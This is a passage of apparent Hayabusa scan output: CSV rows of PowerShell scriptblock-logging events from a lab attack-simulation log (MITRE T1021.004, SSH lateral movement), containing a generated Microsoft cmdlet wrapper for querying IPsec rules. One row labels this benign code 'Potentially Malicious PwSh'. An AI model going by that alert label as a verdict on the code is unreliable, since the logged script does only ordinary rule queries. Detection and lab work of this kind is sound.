[CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,", [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewP",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,", [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 